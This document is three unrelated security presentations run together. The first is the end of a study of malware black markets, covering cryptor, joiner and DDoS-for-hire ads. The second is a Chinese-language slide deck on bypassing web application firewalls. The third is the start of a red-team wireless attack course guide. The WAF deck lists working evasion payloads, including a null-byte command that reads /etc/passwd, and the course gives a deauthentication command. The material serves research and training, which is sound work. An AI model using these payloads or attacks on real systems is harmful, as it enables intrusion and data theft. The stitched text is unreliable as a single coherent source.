• Works with redirect using UID bot (After loading establish redirect on a page with a mistake). • Page substitution (http: // Original/login.html => [you are a guest, you cannot view the page. Registration / Login]. • URL Substitution in an address line, the status of bar and page properties. * By default the trojan is completed by fake Wellsfargo, BOA, cajamadrid, lloystb, barclays. Binding Tools: Free Joiner • Free Joiner Polymorphic by GlOFF – First polymorphic joiner “without equal and worthy competitors in the network” • The overall functionality : [+] Glued unlimited number of files of any format and content. [+] Glued to the minimum files (with the default values is 1K). [+] Glued file individual keys (transfer hidden files). [+] Dynamic of stabilizing the body (boot) in the process of compilation. [+] Location stabilizing the body, glued files and information on their location in one section of the file (complexity detects virus). [+] Very high speed unpack files at startup, regardless of their size. [+] The conservation options and settings last glue. [+] You can edit the resulting file to reflect information from other files (.exe, .dll) General optional settings : [+] Select interface language (or Rus Eng). [+] The change icons (. ico. exe. dll). [+] Integrated package goes file (UPX, FGS, MEW, Petite, Upack). • The full build costs 30 wmz, though a free download is available with less functionality. Binding Tools: Free Joiner Encryption Tools: SimbiOZ Cryptor • SimbiOZ Cryptor 1.x by 3xpl01t • Good day. I suggest you cryptor privacy. It is unique in the features Key features : - Encryption-executable files - Hiding file by intercepting API - Hiding process by intercepting API - Firewall not hang a change in the memory usage of injected code. - Source methodology for the selection of code injection can hide file and the process even under the unprivileged user, and not just under admin. - Hiding interception API some anti-rootkit programs (such RootkitRevealer) - Bypassing personal firewalls by masking agent under the annex (Svchost.exe) - Perhaps compress already encrypted file type Packers FSG. - The kit will include private Joiner. - Price : 10 WMZ, 2 updates for free. Encryption Tools: SimbiOZ Cryptor DDoS Services • DDoS Service from hack-shop.org.ru Competitors have started to press? Someone stirs (prevents) to your business? It is necessary to put out of action a site of "opponent"? We are ready to solve yours We offer service on elimination of not desired sites for you. BOT-NET constantly increases! Our bots are in different time zones that allows to hold constantly in online Numerical army of bots, and in difference from other services - it is impossible to close our attack on the country (for example to China :)). 1 hour - 20 $ 24 hours from 100 $ Large projects - from 200 $ depending on complexity of the order. Complexity of the order is defined/determined by width of the channel, filters, a configuration of a server. Forward the full sum undertakes... Spam Services • Spam services from iNFEccTED-TeAM – Respected ladies and gentlemen! we propose to your attention the straight post distribution of the letters of the advertising or information nature. Our address base: legal persons, organization, enterprise, the producers of goods and services, the specialized address base of data (personal selection, and also the start in it of your contacts). 
Distribution is produced on exclusive software, developed by our command iNFEccTED-TeAM It is professional, it is operational, it is qualitative. our valuations: USA 1) US the partner Quantity --1 200 000 Exclusive base. 2) the physical persons Quantity --3 000 000 Exclusive base. ICQ Numbers • .ka$ta [ ICQ ] - 5d, 6d, 7d, 8d. • 5d: 4444x [ clean ] - $1500 6d: 4x444x [ clean ] - $150 666xx6 [ clean ] - $300 11x111 [ pm ] - $450 x22222 [ clean ] - $750 x00000 [ pm ] - $2500 7d-8d:: 11111xx [ clean ] - $65 1x111x1 [ inv ] - $55 4444xx4 [ inv ] - $50 xx8888x [ inv ] - $50 5x5555x [ inv ] - $50 x6x6666 [ inv ] - $50 11Oct.1111 [ clean ] - $170 2222X22 [ pm ] - $160 55X5555 [ i ] - $170 • Tags from MakZer ' a • XYZ 922242 - 20 wmz 778717 - 17 wmz Stairs 543-002 - 9 wmz 313-789 - 8 wmz 6-654-25 - 6 wmz 475-234 - 5 wmz 15-321-7 - 5 wmz 6-345-06 – 4.5 wmz XYZA 504242 – 6.5 wmz 508804 - 6 wmz 692009 - 6 wmz 313108 - 6 wmz 785572 - 5 wmz 409477 - 5 wmz 383404 - 5 wmz Individuals also regularly buy and sell ICQ numbers and tools Free Tools • Many sites also provided access to free downloads – Older bots and malware – Password scanners – FTP checkers – ICQ tools – Proxy checkers – Articles – Exploits – Warez Purchasing • Individuals interested in purchasing products from a seller must contact them privately – ICQ – E-mail – Private messages in forum • Buyers place orders and pay for services – E-gold – Web money (WM) – Western Union – Escrow payments Organization of Market Actors • There is an organizational continuum of sellers in malware markets based on seller reputation Rippers Unverified Sellers Verified Sellers l----------------------------------l-------------------------------------l • Some forums maintain white and black lists to indicate who is trustworthy – Rippers Database is also an important resource Market Forces in Malware Forums • Four market forces shape relationships and actions in malware markets – Quick turnaround – Low prices – Reliable products – Customer service Neutralizing Behavior • Some sellers and writers made comments to negate their involvement in illegal activity – “the bot is a means of testing its network to the object of vulnerabilities, but not the tool for the attacks and other incorrect actions. For its use for any illegal purposes the author does not bear responsibility.” – “The programme was created for informational purposes and to check your own protection (security). 
The author is not liable.” Discussion • All manner of malware and information are being sold or made freely available • Prices are generally low and the services available allow anyone to engage in computer crime and identity theft • These markets operate much like legitimate businesses • Malware writers and carders justify their actions much like other criminals Complex Issues • Law enforcement interdiction appears to have a small impact on the black market for malware • May be difficult to attribute the creation of tools to any one individual or group • The language barriers involved can obfuscate the content of forums • A good deal of time, and skilled personnel are needed to monitor and analyze posts • Transitory nature of forums and communications generally Key Terms For Russian Forums Russian English Форум forum сқачать download Закупка purchase Покупка/Продажа purchase/sale карт/кардинг card/carding счетов account Свалка dump Спам spam трояны trojan Личинка bot Червь worm Халява warez программа program хақер hacker wmz web money (US) Relevant Literature • www.cybercrime.gov • The Cybercrime Blackmarket. Retrived from http://www.symantec.com/avcenter/cybercrime/index_page5.html • Computer Security Institute and Federal Bureau of Investigation. 2006 Computer Crime and Security Survey. Retrieved from http://www.cybercrime.gov/FBI2006.pdf • Florio, Elia. 2005. When malware meets rootkits. Retrieved from http://www.symantec.com/avcenter/reference/when.malware.meets.rootkits.pdf • Holt, Thomas J. and Danielle C. Graves. A Qualitative Analysis of Advanced Fee Fraud Schemes. The International Journal of Cyber-Criminology 1(1). • James, Lance. 2006. Trojans & Botnets & Malware, Oh My! Presentation at ShmooCon 2006. Retrived from http://www.shmoocon.org/2006/presentations.html • National White Collar Crime Center and the Federal Bureau of Investigation. 2006. IC3 2005 Internet Crime Report. Retrieved from http://www.ic3.gov/media/annualreport/2005_IC3Report.pdf • National White Collar Crime Center and the Federal Bureau of Investigation. 2007. IC3 2006 Internet Crime Report. Retrieved from http://www.ic3.gov/media/annualreport/2006_IC3Report.pdf Relevant Literature • Ollmann, Gunter. 2004. The Phishing Guide: Understanding and Preventing Phishing Attacks. Retrived from http://www.ngssoftware.com/papers/NISRWP-Phishing.pdf • Parizo, Eric, B. 2005. Busted: The inside story of Operation Firewall. Retrieved from http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1146949,00.html • Savona, Ernesto U. and Mara Mignone. 2004. The Fox and the hunters: How IC technologies change the crime race. European Journal on Criminal Policy and Research 10(1): 3-26. • http://www.secretservice.gov/press/pub2304.pdf • Taylor, Robert W., Tory J. Caeti, D. Kall Loper, Eric J. Fritsch, and John Liederbach. 2006. Digital Crime and Digital Terrorism. Upper Saddle River, NJ: Pearson Prentice Hall. • Thomas, Rob and Jerry Martin. 2006. The underground economy: Priceless. Login 31(6): 7- 16. • Wuest, Candid. 2005. Phishing in the middle of the stream- Today’s threats to on-line banking. Retrieved from http://www.symantec.com/avcenter/reference/phishing.in.the.middle.of.the.stream.pdf
pdf
Bypassing All Bypassing All Web Application Firewalls Web Application Firewalls OuTian <outian@chroot.org> Agenda Agenda  Introduction  What is WAF  Why need WAF  What does WAF do  How to Bypass WAF  Q & A Introduction Introduction  近年來許多企業開始意識到傳統的資安設 備無法防護針對 Web 應用程式的攻擊  因此紛紛開始佈署「Web Application Firewall」(以下簡稱WAF)  本主題要強調的是-WAF並不是萬靈藥, 絕對沒有 100% 的防禦能力,不要再聽 信沒有根據的謠言了!  在設定不當的情況下,有裝跟沒裝一樣 … 傳說中只要拔到獅子的鬃毛 …… 聽說只要裝了 WAF,就可以 萬無一失哦! About Me  OuTian < outian@chroot.org > • 會唸的人叫我 ㄠˋ ㄊㄧㄢ • 不會唸的人叫我「黑糖」、「凹臀」、「熬湯」  現任 • 敦陽科技 資安服務處 資安顧問  經歷 – • HIT2007 – 「Implementation of Web Application Firewall」 • HIT2007/2008 0day Advisory  專長 – • 滲透測試、資安設備佈署 • DDoS攻擊與防護、資安事件緊急應變 What is WAF  深入解析HTTP、HTML、XML內容之 • 網路硬體設備 • 主機式軟體  處理 Client 與 Web Server 間之傳輸  用以防禦針對動態網頁應用程式之攻擊  避免內部之敏感訊息或資料外洩 WAF Vendors (in TW)  (廠牌) - (產品名稱)  AppliCure - dotDefender  Armorize - SmartWAF  Barracuda - Web Application Controller  Cisco - ACE  Citrix - NetScaler  F5 - Big-IP / ASM  Imperva - SecureSphere  Radware - AppWall  …others  (以上依廠牌名稱排序) WAF Vendors (Global)  BeeWare  BinarySEC  Breach / ModSecurity  Deny All  Visonys  ... others 常見 Web 應用程式弱點 (1)  程式過濾不當 • SQL Injection  竊取資料、入侵網站 • Cross Site Scripting  利用網站弱點竊取其他用戶資料 • Arbitrary File Inclusion  入侵網站 • Code/Command Injection  入侵網站 • Directory Traversal  瀏覽敏感資訊檔案 • Buffer Overflow  入侵網站主機 常見 Web 應用程式弱點 (2)  邏輯設計不良 • Cookie Poisoning  變換身份、提升權限 • Parameter Tampering  竄改參數,使應用程式出現不可預期反應 • Upload File Mis-Handling  植入網站木馬 • Information Disclosure  洩露網站資訊 • Weak Authentication  脆弱的認證機制 WAF v.s IDP/IPS  網頁防火牆 • Positive Security Model (正向表列白名單) • 行為模式分析 Behavior Modeling • 置入金鑰/憑證,可解析 SSL封包 • 會追蹤表單/Cookie  入侵偵測系統 • Negative Security Model (負向表列黑名單) • 特表碼辨識 Signature based • 無法解析 SSL 封包 • 不追蹤 表單/Cookie What does WAF do ? 
• Input Validation
  • Protocol
  • URL
  • Parameter
  • Cookie/Session
• Output Checks
  • Protocol
  • Headers
  • Error Messages
  • Credit Card Number
  • Sensitive Information

Input Validation (Protocol / URL / Parameter / Cookies)
• A normal HTTP request:
GET /search?q=test HTTP/1.1
Accept: */*
Accept-Language: zh-tw
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: www.google.com.tw
Connection: Keep-Alive
Cookie: SESSIONID=8E938AF24D97

Protocol Protection
• Buffer Overflow
• Denial of Service
• Abnormal
  • HTTP Methods: GET/POST/HEAD, CONNECT, PUT, DELETE
  • HTTP Headers: Host, User-Agent, Content-Length

URL Protection
• Forceful Browsing
• Configuration files: *.inc, *.cfg, *.log
• Database files: *.sql, *.mdb
• Backup files: *.bak, *.old, *.tmp, *~
• Archive files: *.rar, *.zip, *.tgz
• Document files: *.pdf, *.xls, …

Parameter Protection
• SQL/Code/Command Injection
• Cross Site Scripting
• Arbitrary File Inclusion
• Directory Traversal
• Parameter Tampering

Cookie Protection
• Session Stealing
• Cookie Poisoning

Output Checks (Protocol / Headers)
• A normal HTTP response:
HTTP/1.1 200 OK
Date: Sun, 19 Jul 2009 05:43:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Apache/2.0.52
X-Powered-By: PHP/4.3.9
<html> <head> <title> …
• (Things to catch in the output: credit card numbers such as 5520-1234-1234-1234, error messages such as "Xxx Error SQL in …", and other sensitive information)

Header Protection
• Remove or rewrite specific headers, e.g. Server, X-Powered-By
• Some products also offer Cookie Proxy / Cookie Encryption features

Sensitive Information Protection
• Intercept sensitive content
  • Credit card numbers
  • Server error messages
  • Database error messages
  • Personal-data strings matching configured formats
• Handling options
  • Remove it
  • Mask it (XXX or ***)
  • Block the entire page

Positive Model vs. Negative Model
• Negative model
  • Commonly called a "blacklist"
  • Fast to deploy
  • Easy to bypass
  • Prone to false positives
• Positive model
  • Commonly called a "whitelist"
  • Takes time to learn/configure
  • Strict protection
  • No false positives (unless the administrator misconfigures it)

How to Bypass a WAF
• Simple techniques
• Negative model
  • Magic %
  • HTTP Parameter Pollution
  • Special checks
• Positive model
  • Bypassing the matching conditions

Simple Techniques (usually already mitigated)
• Case conversion (many WAFs ignore case when checking)
  • On Windows, test.asp == TEST.ASP
• Escape characters
  • In some cases, a = \a
• URL encoding (most WAFs URL-decode before checking)
  • Path encoding: /test.asp = /%74%65%73%74%2E%61%73%70
  • Parameter encoding: /etc/passwd = %2F%65%74%63%2F%70%61%73%73%77%64

Whitespace Alternatives
• Common substitutes
  • (space) = %20
  • \t (TAB) = %09
  • \n = %0A
  • \r = %0D
• In SQL: /**/ for MSSQL
• In XSS: /**/ in some cases

Path Obfuscation
• Self-referencing directory: /test.asp == /./test.asp
• Double directory separators: /test.asp == //test.asp
• Directory traversal: /etc/passwd == /etc/./passwd, /etc/passwd == /etc/xx/../passwd
• Directory separator characters: ../../cmd.exe == ..\..\cmd.exe

More Complex Encodings
• Double decoding: / = %2F = %252F
• Overlong characters: 0xc0 0x8A = 0xe0 0x80 0x8A = 0xf0 0x80 0x80 0x8A = 0xf8 0x80 0x80 0x80 0x8A
• Unicode encoding: /test.cgi?foo=../../bin/ls = /test.cgi?foo=..%2F../bin/ls = /test.cgi?foo=..%c0%af../bin/ls

Null-Byte Attacks
• %00
• The null byte (0x00) is commonly treated as a string terminator by language functions such as strcmp(), strcpy(), sprintf(), etc.
• Many string-checking mechanisms stop inspecting the rest of the string once they hit 0x00
  • /aa.php?cmd=ls%00cat%20/etc/passwd

Negative Checks – how normal encoding works
• Character encoding
  • A => %41
  • & => %26
  • ' => %27
• Normal scope: %00 ~ %FF
• So: select => %73%65%6C%65%63%74

Magic %
• When the two characters after % are not in the valid range…
  • select = sele%ct = s%elect
  • …extend this to other examples yourself
• Can be used to bypass any blacklist check (SQL, XSS, … etc.)
• The language automatically strips the invalid % !!!
• *** Only ASP behaves this way ***

Why Bypass?
Injected string (what the WAF sees) → what ASP interprets it as:
• <if%rame> → <iframe>
• <scr%ipt> → <script>
• ;dr%op %table xxx → ;drop table xxx
• sele%ct * fr%om … → select * from …

HTTP Parameter Pollution (from blog.iis.net)
• In a typical web application, a given page has only one parameter with a given name
  • http://www.google.com.tw/search?hl=zh-TW&q=test
• When multiple parameters with the same name are supplied, platforms react inconsistently (server enumeration):
  • Concatenate all of them
  • Take the first one
  • Take the last one
  • Turn them into an array (ARRAY)

How it is used
• Split the attack string you want to inject across several parameters with the same name
• As the request passes through the WAF, no signature is matched, so it is allowed through
• Inside the application, the same-named parameters are recombined and the original attack string is restored

Special Check – Bypass SQL
• Most WAFs inspect parameters containing SQL signatures especially deeply:
  • '
  • ;
  • SQL comments: --, /*, #
• Try to attack without those signatures:
  • Attack numeric parameters (no ' needed)
  • Complete the trailing SQL yourself instead of using comment characters
  • Magic %

Special Check – Bypass XSS
• HTML/CSS/JavaScript syntax is extremely flexible
• Most WAFs cannot ship every pattern (too easy to block legitimate traffic)
• A slight mutation is enough to get through
• XSS Cheat Sheet: http://ha.ckers.org/xss.html

Positive Checks
• Most WAFs do have an auto-learning feature
• They can profile a site's normal usage: HTTP method, URL, parameters, forms, cookies
• …but because administrators are lazy, the vast majority never configure it (orz)

If it is configured
• Rule 1
  • http://www.test.com/news.asp
  • id
  • Constraints: integer format ( ^\d+$ ), length 1–20
• Rule 2
  • http://www.test.com/login.asp
  • Username
  • Constraints: letters + digits + underscore ( ^[_a-zA-Z0-9]+$ ), length 1–12
• …and many more similar rules

How to bypass it
• Do not match the checking conditions!
  • Policy condition
  • URL
  • Parameter
  • …etc.

Why does this work?
• Large sites have far too many URLs and parameters
• Where nothing has been configured, the WAF does not know what the format should be, so it has to let the request through and learn later
• Use the string mutation, encoding, path obfuscation, and Magic % tricks described earlier so that you never match the conditions the WAF has defined

A real-world case
• www.test.com = IP: x.x.x.x
  • The WAF is configured to apply a certain inspection profile when the hostname == www.test.com or the hostname == x.x.x.x
• Ways around it:
  • Send no Host header
  • Connect using "www.test.com:80" as the Host value
  • Modify the hosts file and supply an arbitrary Host header

Securing Web Applications
• Lifecycle phases: Define, Design, Develop/Test, Deploy, Maintain
• Activities: security requirements, risk analysis, design review, static analysis (tools) / source code review, dynamic testing, penetration testing & web vulnerability scanning, web application firewall, continuous monitoring, secure coding training

DEMO

Q & A

Reference
• WAF Reviews – http://sites.google.com/a/wafreviews.com/home/Home
• OWASP AppSecEU09 Poland
  • HTTP Parameter Pollution
  • Web Application Firewalls: What the vendors do NOT want you to know
• WAFEC, or how to choose WAF technology
• Split and Join – http://www.milw0rm.com/papers/340
• SQL Injection Hijinks – http://blogs.technet.com/neilcar/archive/2008/10/31/sql-injection-hijinks.aspx
Advanced Wireless Attacks Against Enterprise Networks
Course Guide
Version 1.0.2
Gabriel Ryan
@s0lst1c3 @gdssecurity
gryan@gdssecurity.com
solstice.me

Contents
Introduction
Lab Setup Guide
Target Identification Within A Red Team Environment
    Chapter Overview
    Scoping A Wireless Assessment: Red Team Style
        Linguistic Inference
        Sequential BSSID Patterns
        OUI Prefixes
    Using Geographic Cross-Referencing To Identify In-Scope Access Points
    Expanding The Scope By Identifying Sequential BSSIDs
Attacking And Gaining Entry To WPA2-EAP Wireless Networks
    Chapter Overview
    Wireless Theory: Evil Twin Attacks
    Wireless Theory: WPA2-EAP Networks
    Evil Twin Attack Using Hostapd-WPE
    Lab Exercise: Evil Twin Attack Against WPA2-PEAP
Wireless Man-In-The-Middle Attacks
    Chapter Overview
    Configuring Linux As A Router
    Lab Exercise: Using Linux As A Router
    Classic HTTPS Downgrade Attack
    Lab Exercise: Wireless MITM With An HTTP Downgrade
    Downgrading Modern HTTPS Implementations Using Partial HSTS Bypasses
    Lab Exercise: Wireless MITM With Partial HSTS Bypass
SMB Relays And LLMNR/NBT-NS Poisoning
    Chapter Overview
    LLMNR And NBT-NS Poisoning Using Responder
    Lab Exercise: LLMNR/NBT-NS Poisoning
    SMB Relay Attacks With impacket
    Lab Exercise: SMB Relay Attacks
Firewall And NAC Evasion Using Indirect Wireless Pivots
    Chapter Overview
    Configuring Linux As A Captive Portal
    Lab Exercise: Captive Portal
    Wireless Theory: Hostile Portal Attacks
    Wireless Redirect To SMB With LLMNR And NBT-NS Poisoning
    Lab Exercise: Wireless Redirect To SMB With LLMNR/NBT-NS Poisoning
Conclusion
Resources

Introduction
Welcome to Advanced Wireless Attacks Against Enterprise Networks. In this workshop we'll be going a few steps beyond classic techniques such as ARP replay attacks and WPA handshake captures. Instead we will focus on learning how to carry out sophisticated wireless attacks against modern corporate infrastructure. Our ultimate goal will be to learn how to leverage wireless as a means of gaining access to protected enterprise networks, and to escalate access within those networks to access sensitive data.
There will be some overlap between the material covered in this course guide and material that would be more appropriate in a book about internal network penetration testing. This is unavoidable, since wireless and internal network penetration testing go hand-in-hand. They are both part of the same process of gaining unauthorized access to the network, then escalating that access as far as possible until full organizational compromise is achieved. However, in an effort to keep the scope of this workshop manageable, we're going to focus on testing from a wireless perspective as much as possible.

Lab Setup Guide
Before we begin, it is recommended that you complete the lab setup guide that was included with this document.
Depending on your previous experience using Active Directory and VirtualBox, it could take between two to five hours to complete the lab setup process. Please do not hesitate to reach out to the instructor should you encounter difficulties. Target Identification Within A Red Team Environment Chapter Overview Like any form of hacking, well executed wireless attacks begin with well-executed recon. During a typical wireless assessment, the client will give you a tightly defined scope. You’ll be given a set of ESSIDs that you are allowed to engage, and you may even be limited to a specific set of BSSIDs. During red team assessments, the scope is more loosely defined. The client will typically hire your company to compromise the security infrastructure of their entire organization, with a very loose set of restrictions dictating what you can and can’t do. To understand the implications of this, let’s think about a hypothetical example scenario. Evil Corp has requested that your firm perform a full scope red team assessment of their infrastructure over a five week period. They have 57 offices across the US and Europe, most of which have some form of wireless network. The client seems particularly interested in wireless as a potential attack vector. You and your team arrive at one of the client sites and perform a site-survey using airodump-ng, and see the output shown below. Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 4 CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID 1C:7E:E5:E2:EF:D9 -66 10 572 283 0 1 54 WPA2 CCMP MGT 1C:7E:E5:E2:EF:D8 -66 11 569 83 1 1 54 WPA2 CCMP MGT 1C:7E:E5:E2:EF:D7 -66 12 580 273 0 1 54 WPA2 CCMP MGT 1C:7E:E5:E2:EF:D6 -66 10 566 43 0 1 54 WPA2 CCMP MGT 1C:7E:E5:62:32:21 -68 11 600 24 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A4 -68 0 598 82 2 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A5 -68 9 502 832 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:B1 -64 14 602 23 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A6 -65 12 601 42 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A7 -62 12 632 173 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A8 -62 10 601 21 1 11 54 WPA2 CCMP MGT 00:17:A4:06:E4:C6 -74 10 597 12 0 6 54 WPA2 TKIP MGT 00:17:A4:06:E4:C7 -74 8 578 234 0 6 54 WPA2 TKIP MGT 00:17:A4:06:E4:C8 -74 10 508 11 1 6 54 WPA2 TKIP MGT 00:17:A4:06:E4:C9 -72 11 535 12 0 1 54 WPA2 TKIP MGT 00:13:E8:80:F4:04 -74 11 521 132 0 1 54 WPA2 TKIP MGT prN67n 00:22:18:38:A4:64 -68 12 576 10 0 3 54 WPA2 CCMP MGT ASFWW 00:22:18:38:A4:65 -68 12 577 431 0 3 54 WPA2 CCMP MGT ASFWW None of the networks within range have an ESSID that conclusively ties them to Evil Corp. Many of them do not broadcast ESSIDs, and as such lack any identification at all. To make matters worse, the branch location your team is scoping out is immediately adjacent to a major bank, a police station, and numerous small retail outlets. It is very likely that many of the access points that you see in your airodump-ng output belong to one of these third parties. During some engagements, you may be able to reach out to the client at this point and ask for additional verification. More likely, however, you’ll have to identify in-scope targets yourself. Let’s talk about how to do this. 
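Before that, for reference, a site survey like the one described in this scenario can be captured with the aircrack-ng suite. This is only a minimal sketch: the interface names and the output prefix below are assumptions rather than part of the course's lab setup.

# place the wireless adapter into monitor mode (assumes the adapter is wlan0;
# recent versions of airmon-ng typically create a monitor interface named wlan0mon)
root@localhost:~# airmon-ng start wlan0

# channel-hop and log every access point and client seen, writing capture files
# with the prefix "survey-site1" so the results can be compared between sites
root@localhost:~# airodump-ng --write survey-site1 wlan0mon

Saving the survey to disk is what makes the geographic cross-referencing technique described next practical, since the output from each client site can be diffed offline.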
Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 5 Scoping A Wireless Assessment: Red Team Style We have four primary techniques at our disposal that we can use to identify in-scope wireless targets: ▪ Linguistic Inference ▪ Sequential BSSID patterns ▪ Geographic cross-referencing ▪ OUI Prefixes Let’s talk about each of these techniques in detail. Linguistic Inference Using Linguistic Inference during wireless recon is the process of identifying access points with ESSIDs that are linguistically similar to words or phrases that the client uses to identify itself. For example, if you are looking for access points owned by Evil Corp and see a network named “EvilCorp-guest”, it is very likely (although not certain) that this network is in-scope. Similarly, if you’re pentesting Evil Corp but see an ESSID named “US Department of Fear,” you should probably avoid it. Sequential BSSID Patterns In our airodump-ng output, you may notice groups of BSSIDs that increment sequentially. For example: 1C:7E:E5:E2:EF:D9 1C:7E:E5:E2:EF:D8 1C:7E:E5:E2:EF:D7 1C:7E:E5:E2:EF:D6 When you see a group of APs with BSSIDs that increment sequentially, as shown above, it usually means that they are part of the same network. If we identify one of the BSSIDs as in-scope, we can usually assume that the same is true for the rest of the BSSIDs in the sequence. 1C:7E:E5:E2:EF:D9 1C:7E:E5:E2:EF:D8 1C:7E:E5:E2:EF:D7 1C:7E:E5:E2:EF:D6 Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 6 OUI Prefixes The first three octets in a mac address identify the manufacture of the device. If we discover evidence that the client has a contract with certain hardware manufactures, we focus our attention on APs with OUI prefixes that correspond to these brands. Using Geographic Cross-Referencing To Identify In-Scope Access Points The most powerful technique we can leverage is geographic cross-referencing. We mentioned that Evil Corp has 57 offices worldwide. If we see the same ESSIDs appear at two Evil Corp locations, and no other 3rd party is present at both of these locations as well, it is safe to conclude that the ESSID is used by Evil Corp. We’ll apply these principles to identify in-scope access points in our airodump-ng output from the last section. Before we continue, we should attempt to decloak any wireless access points that have hidden ESSIDs. We do this by very briefly deauthenticating one or more clients from each of the hidden networks. Our running airodump-ng session will then sniff the ESSID of the affected access point as the client reassociates. Tools such as Kismet will do this automatically, although on sensitive engagements it’s preferable to do this manually in a highly controlled fashion. To perform the deauthentication attack, we use the following command: If successful, the ESSID of the affected access point will appear in our airodump-ng output. 
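A minimal sketch of that targeted deauthentication is shown here, assuming a monitor-mode interface named wlan0mon and using one of the hidden BSSIDs from the capture; the --deauth option sets how many deauthentication frames to send.

# send a small burst of deauth frames to a single client of the hidden AP,
# then watch the running airodump-ng session for the revealed ESSID
root@localhost:~# aireplay-ng --deauth 3 -a 1C:7E:E5:E2:EF:D6 -c <client MAC (optional)> wlan0mon

Omitting the -c flag broadcasts the deauthentication to every client associated with the access point, which works but is considerably noisier on a sensitive engagement.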
CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID 1C:7E:E5:E2:EF:D9 -66 10 572 283 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D8 -66 11 569 83 1 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D7 -66 12 580 273 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D6 -66 10 566 43 0 1 54 WPA2 CCMP MGT 1C:7E:E5:62:32:21 -68 11 600 24 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A4 -68 0 598 82 2 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A5 -68 9 502 832 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:B1 -64 14 602 23 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A6 -65 12 601 42 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A7 -62 12 632 173 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A8 -62 10 601 21 1 11 54 WPA2 CCMP MGT ECMNV32 00:17:A4:06:E4:C6 -74 10 597 12 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C7 -74 8 578 234 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C8 -74 10 508 11 1 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C9 -72 11 535 12 0 1 54 WPA2 TKIP MGT 00:13:E8:80:F4:04 -74 11 521 132 0 1 54 WPA2 TKIP MGT prN67n 00:22:18:38:A4:64 -68 12 576 10 0 3 54 WPA2 CCMP MGT ASFWW 00:22:18:38:A4:65 -68 12 577 431 0 3 54 WPA2 CCMP MGT ASFWW root@localhost:~# aireplay-ng -b <name of bssid here> -c <mac address of client (optional)> <interface name> Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 7 We have now identified six unique ESSIDs present at the client site. We can cross reference these ESSIDs with the results of similar site surveys performed at nearby client sites. Suppose we know of another Evil Corp branch office 30 miles away. After driving to the secondary location, we discover that none of the third-party entities located at the first branch office are present. Suppose that after decloaking hidden networks, we see that the following access points are within range. CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID D1:3F:E5:A8:B1:77 -66 10 572 283 0 1 54 WPA2 CCMP MGT EC7293 D1:3F:E5:A8:B1:78 -66 11 569 83 1 1 54 WPA2 CCMP MGT EC7293 D1:3F:E5:A8:B1:79 -66 12 580 273 0 1 54 WPA2 CCMP MGT D1:3F:E5:B6:A0:08 -66 10 566 43 0 1 54 WPA2 CCMP MGT ECMNV32 D1:3F:E5:B6:A0:07 -68 11 600 24 0 6 54 WPA2 CCMP MGT 02:12:0B:86:3B:E0 -68 0 598 82 2 6 54 WPA2 CCMP MGT ZP993 02:12:0B:86:3B:E1 -68 9 502 832 0 6 54 WPA2 CCMP MGT 02:12:0B:86:3B:E2 -64 14 602 23 0 6 54 WPA2 CCMP MGT ZP993 72:71:78:D5:C8:02 -65 12 601 42 0 11 54 WPA2 CCMP MGT SaintConGuest 00:12:E8:99:11:11 -62 12 632 173 0 11 54 WPA2 CCMP MGT prN67n Out of the ESSIDs shown above, the ones that are highlighted in red were also found at the first Evil Corp location that we visited. Given the lack of common third-parties present at each of the sites, this is very strong evidence that these ESSIDs are used by Evil Corp, and are therefore in- scope. Expanding The Scope By Identifying Sequential BSSIDs Let’s return to the first client site. Notice that the BSSIDs outlined in red increment sequentially. As previously mentioned, this usually occurs when the APs are part of the same network. We know that EC7293 is in-scope (we confirmed this using geographic cross-referencing). Given that the access points serving EC7293 and ECwnet1 are part of the same group of sequentially incrementing BSSIDs, we can conclude they are both parts of the same network. Therefore, it follows that ECwnet1 is in-scope as well. 
